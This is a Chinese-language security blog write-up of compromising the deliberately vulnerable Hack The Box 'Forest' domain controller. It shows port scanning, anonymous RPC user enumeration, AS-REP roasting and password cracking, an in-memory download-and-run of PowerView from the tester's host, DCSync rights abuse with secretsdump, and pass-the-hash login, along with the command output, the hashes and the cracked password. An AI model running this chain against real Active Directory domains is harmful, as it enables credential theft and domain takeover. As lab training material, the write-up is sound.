freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

HTB-Forest(AD)
HTB-Forest(AD)
n00b2Hacker 2025-03-05 13:33:17 20180
所属地 辽宁省

nmap扫描

扫TCP端口

# nmap -sT --min-rate 1000 -p- 10.10.10.161 -oA nmap/tcp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 11:57 CST
Nmap scan report for 10.10.10.161
Host is up (0.31s latency).
Not shown: 65511 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49684/tcp open  unknown
49706/tcp open  unknown
49979/tcp open  unknown

# ports=$(grep open nmap/tcp.nmap | awk -F '/' '{print $1}' | paste -sd ',')
# echo $ports
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49706,49979

通过有kerberos和LDAP,初步判断是一台域控

扫20个常用的UDP端口

# nmap -sU --top-ports 20 10.10.10.161 -oA nmap/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 11:57 CST
Nmap scan report for 10.10.10.161
Host is up (0.23s latency).

PORT      STATE         SERVICE
53/udp    open          domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    closed        tftp
123/udp   open          ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  closed        upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown

扫TCP开放端口详细服务版本

# nmap -sT -sV -sC -p$ports -O 10.10.10.161 -oA nmap/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 12:06 CST
Nmap scan report for 10.10.10.161
Host is up (0.48s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-22 04:13:54Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49706/tcp open  msrpc        Microsoft Windows RPC
49979/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-22T04:14:56
|_  start_date: 2025-02-20T08:57:46
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2025-02-21T20:15:00-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h46m52s, deviation: 4h37m11s, median: 6m50s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

漏洞脚本扫描

# nmap --script=vuln -p$ports 10.10.10.161 -oA nmap/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 12:19 CST
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.44s latency).

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49684/tcp open  unknown
49706/tcp open  unknown
49979/tcp open  unknown

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

将域名写入hosts文件

# vi /etc/hosts
10.10.10.161    htb.local
10.10.10.161    forest.htb.local

获得初始立足点

smb匿名登录啥也没有
image

枚举rpc

# rpcclient -U% 10.10.10.161	-U%:匿名登录,不需要用户名和密码

rpcclient $> enumdomusers			#枚举域内所有用户
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

rpcclient $> queryuser 0x1f4		#查看域管理员信息
        User Name   :   Administrator
        Full Name   :   Administrator
        Description :   Built-in account for administering the computer/domain
        user_rid :      0x1f4
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000007d
        padding1[0..7]...
        logon_hrs[0..21]...

rpcclient $> enumdomgroups			#枚举域内所有组
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]

rpcclient $> querygroup 0x200		#查询域管理员组
        Group Name:     Domain Admins
        Description:    Designated administrators of the domain
        Group Attribute:7
        Num Members:1
rpcclient $> querygroupmem 0x200	#查看域管理员组成员
        rid:[0x1f4] attr:[0x7]

rpcclient $> querydominfo			#查询域信息
Domain:         HTB
Server:
Comment:
Total Users:    105
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1

将枚举出来的用户保存至users文件中,并把用户名的部分提取出来

# cat users
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

# grep user users | awk -F '[\\[\\]]' '{print $2}' > username
# cat username 
Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi

AS-REP Roasting 攻击

拿到用户列表后,想到 AS-REP Roasting 攻击。AS-REP Roasting 是一种针对未启用 Kerberos 预认证的用户账户的攻击方法。如果某个用户账户未启用预认证,则攻击者可以通过发送 AS-REQ 请求直接获取该用户的 AS-REP 响应,AS-REP 包含加密的 EncKDCRepPart,其中包含 TGT 和会话密钥。这些响应是 NTLM 哈希加密的,可以保存为哈希文件,并将其离线破解以恢复用户的密码。

GetNPUsers.py 工具用于检测和利用未启用 Kerberos 预认证的用户账户。主要用于以下两个目的:

1、发现未启用 Kerberos 预认证的用户

2、捕获 AS-REP 响应(是一个标准的 AS-REP 哈希格式)

//从username中读取用户名列表,并尝试获取这些用户的 NTLM 哈希或 Kerberos 票据,并且不提供密码
# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb/ -usersfile username -dc-ip 10.10.10.161 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecate	d and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB:2a264227856d5cc2c031bacc26f834af$9cd45159ff2909874960b4f6f2899a27bcee1f3e5a3e0803aa5c822af0815d84b2277b6f278c23024a3e7211bf57f164559618aef3052a594edc7365f0535f41ddee11811d75dd056cb7f145c12827a6724ab719d6fa295f27f0c04bb0e93689cf44288a88feefe109f4431f92cafd0c7f0ad791d7804e3c88a1df4f9d91aa4325bfa9c658567b26cf737b30c9543813f83c13d9b94feb69b1e9cc1e155bc4557274a42ef14ec59324e63f5b55b0c798ff32daaadea4ef618476da04ee357c84edc048eb8cae12ead590b8dc441b9962119d47ac19b7ba5a2968e2221ad15213
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

拿到$krb5asrep$23$svc-alfresco@HTB:2a264227856d5cc2c031bacc26f834af$9cd45159ff2909874960b4f6f2899a27bcee1f3e5a3e0803aa5c822af0815d84b2277b6f278c23024a3e7211bf57f164559618aef3052a594edc7365f0535f41ddee11811d75dd056cb7f145c12827a6724ab719d6fa295f27f0c04bb0e93689cf44288a88feefe109f4431f92cafd0c7f0ad791d7804e3c88a1df4f9d91aa4325bfa9c658567b26cf737b30c9543813f83c13d9b94feb69b1e9cc1e155bc4557274a42ef14ec59324e63f5b55b0c798ff32daaadea4ef618476da04ee357c84edc048eb8cae12ead590b8dc441b9962119d47ac19b7ba5a2968e2221ad15213 哈希值后,保存到hash文件中。

使用john破解

# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:02 DONE (2025-02-23 15:47) 0.3649g/s 1491Kp/s 1491Kc/s 1491KC/s s4553592..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

evil-winrm登录


获得svc-alfresco用户的密码为s3rvice,使用evil-winrm登录

# evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

image
确认靶机IP没问题,获得立足点,拿到user flag
image

提权

SharpHound收集数据

由于SharpHound.ps1脚本大于1mb,所以选择在内存中执行。

得到的zip压缩包直接download,下载到开启evil-winrm的路径下。
image

上传数据到bloodhound失败

上传到bloodhound时,出现了问题,进度永远是0
image
image
应该是我的桌面环境有一些问题,尝试解决也无果。

也尝试使用docker运行bloodhound,但由于bloodhound版本问题,依然无法得到结果。

其实可以直接查看得到的json数据,但一来数据太多,二来想自己手动枚举尝试一下。

手动枚举AD模块

当前用户最终属于Account Operators组和Remote Management Users组。

Remote Management Users组决定了我们可以通过evil-winrm远程登陆。

Account Operators组主要用于管理本地用户和组账户。
image

获取 htb.local 域根对象的 ACL

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $domainDN = (Get-ADDomain).DistinguishedName
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $acl = Get-Acl -Path "AD:\$domainDN"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $acl.Access | Format-Table -Property IdentityReference, ActiveDirectoryRights, AccessControlType

先查找对域有 GenericAll 完全控制权限的用户和组

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $acl.Access | Where-Object { $_.ActiveDirectoryRights -match "GenericAll" } | Format-Table -Property IdentityReference, ActiveDirectoryRights, AccessControlType

IdentityReference              ActiveDirectoryRights AccessControlType
-----------------              --------------------- -----------------
NT AUTHORITY\SYSTEM                       GenericAll             Allow
HTB\Enterprise Admins                     GenericAll             Allow
HTB\Organization Management               GenericAll             Allow
HTB\Exchange Trusted Subsystem            GenericAll             Allow

再查找有写相关权限的,结果太多了,基本上围绕 Organization Management 组、Exchange Trusted Subsystem 组、Exchange Servers 组、Exchange Windows Permissions 组。

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $writePermissionsPattern = "WriteProperty|WriteDacl|WriteOwner|GenericWrite"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $acl.Access | Where-Object { $_.ActiveDirectoryRights -match $writePermissionsPattern } | Format-Table -Property IdentityReference, ActiveDirectoryRights, AccessControlType

Organization Management 是一个管理角色组,提供对整个 Exchange 组织的广泛管理权限。

Exchange Trusted Subsystem 是一个内置的安全组,主要用于Exchange 服务器内部通信,是 Exchange Windows Permissions 组的成员。

Exchange Servers 是一个内置的安全组,用于服务器到服务器的通信和资源共享。

Exchange Windows Permissions 是一个内置的安全组,用于管理 Exchange 与 Active Directory 之间的交互权限。

分别列举各自的ACL,查看当前用户所在的 Account Operators组,有没有权限。

# 以 Exchange Windows Permissions 组为例

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $exchangeTrustedSubsystemGroup = Get-ADGroup -Identity "Exchange Windows Permissions"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $groupDN = $exchangeTrustedSubsystemGroup.DistinguishedName
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $acl = Get-Acl -Path "AD:\$groupDN"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $acl.Access | Format-Table -Property IdentityReference, ActiveDirectoryRights, AccessControlType

BUILTIN\Account Operators 对这四个组都有 GenericAll 完全控制权。

这四个组中,Organization Management 有广泛的管理权限,是 Exchange 组织中的最高管理组,可以提权。Exchange Windows Permissions 用于在 Active Directory 中为 Exchange 提供必要的权限,它可以直接影响 Active Directory 中的对象,可以提权。

加入Exchange Windows Permissions 组

新建 svc_backup 用户,并将其添加进 Exchange Windows Permissions 组以及 Remote Management Users组,以便于远程登陆。

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user svc_backup svc_backup123 /add /domain

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group 'Exchange Windows Permissions' svc_backup /add /domain

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup 'Remote Management Users' svc_backup /add

常用的提权方法是用 Exchange Windows Permissions 组默认的 WriteDACL权限,这意味着可以为任何用户或组添加对域对象的各种权限,包括 Replicating Directory Changes All(即 DCSync 权限),从而导出域内所有用户hash。

以 svc_backup 用户身份登录,并在内存中执行 PowerView.ps1

# evil-winrm -i 10.10.10.161 -u svc_backup -p svc_backup123

*Evil-WinRM* PS C:\Users\svc_backup\Documents> iex(New-Object System.Net.Webclient).downloadstring('http://10.10.16.33/PowerView.ps1')

//给svc_backup用户添加 DCSync 权限
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc_backup -Rights DCSync

DCSync 攻击

通过 secretsdump 执行 DCSync 攻击,获取所有用户的哈希

# /usr/share/doc/python3-impacket/examples/secretsdump.py 'htb.local/svc_backup:svc_backup123@10.10.10.161' 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

evil-winrm 登录

# evil-winrm -i 10.10.10.161 -u Administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

image

使用 Organization Management 组时,一样的利用方式,但转储哈希时会有报错,还是优先使用Exchange Windows Permissions 组吧,主要是第一次接触域渗透,不了解的还有很多。

# /usr/share/doc/python3-impacket/examples/secretsdump.py 'htb.local/wu:n00b2Hacker@10.10.10.161'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 

# /usr/share/doc/python3-impacket/examples/secretsdump.py -use-vss 'htb.local/wu:n00b2Hacker@10.10.10.161'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Cleaning up...
# HTB渗透
本文为 n00b2Hacker 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
HTB-Cicada 靶机笔记 原创
付费
HTB-Cicada 靶机笔记

系统安全

HTB-Cicada 靶机笔记

大白腿555

38908围观 2025-04-10

HTB-Toolbox
HTB-Toolbox

基础安全

nmap扫描扫tcp端口# nmap -sT --min-rate 10000 -p- 10.10.10.236 -oA nmap/tcp ...

n00b2Hacker

100106围观 2025-03-07

2025最新&模拟器微信小程序抓包&小程序反编译 原创
付费
2025最新&模拟器微信小程序抓包&小程序反编译

Web安全

整整配了3天3夜,才找到一个门槛低,操作相对容易的软件。为了让大家更好的做测试,就想分享一下吧。

zero1234

214431围观  · 13收藏  · 75喜欢 2025-04-05

Kubernetes :k8s一主两从集群搭建—实现全纪录 原创
Kubernetes :k8s一主两从集群搭建—实现全纪录

云安全

从零开始搭建一个高可用的Kubernetes(k8s)一主两从集群,适合初学者和运维人员快速上手。

Prog77X

112703围观  · 5收藏 2025-03-26

Kubernetes HPA 实战:Pod水平自动伸缩—实现全纪录 原创
Kubernetes HPA 实战:Pod水平自动伸缩—实现全纪录

云安全

手把手教你配置Kubernetes Pod水平自动伸缩(HPA),涵盖CPU/内存扩缩容和Prometheus自定义指标,附完整YAML示例...

Prog77X

48417围观 2025-03-26

n00b2Hacker LV.3
千磨万击还坚劲,任尔东西南北风!
  • 7 文章数
  • 2 关注者
Sudo提权(上)
2025-03-16
HTB-Toolbox
2025-03-07
HTB-Timelapse
2025-02-19
文章目录
nmap扫描
  • 扫TCP端口
  • 扫20个常用的UDP端口
  • 扫TCP开放端口详细服务版本
  • 漏洞脚本扫描
  • 将域名写入hosts文件
获得初始立足点
  • 枚举rpc
  • AS-REP Roasting 攻击
  • evil-winrm登录
提权
  • SharpHound收集数据
  • 上传数据到bloodhound失败
  • 手动枚举AD模块
  • 加入Exchange Windows Permissions 组
  • DCSync 攻击
  • evil-winrm 登录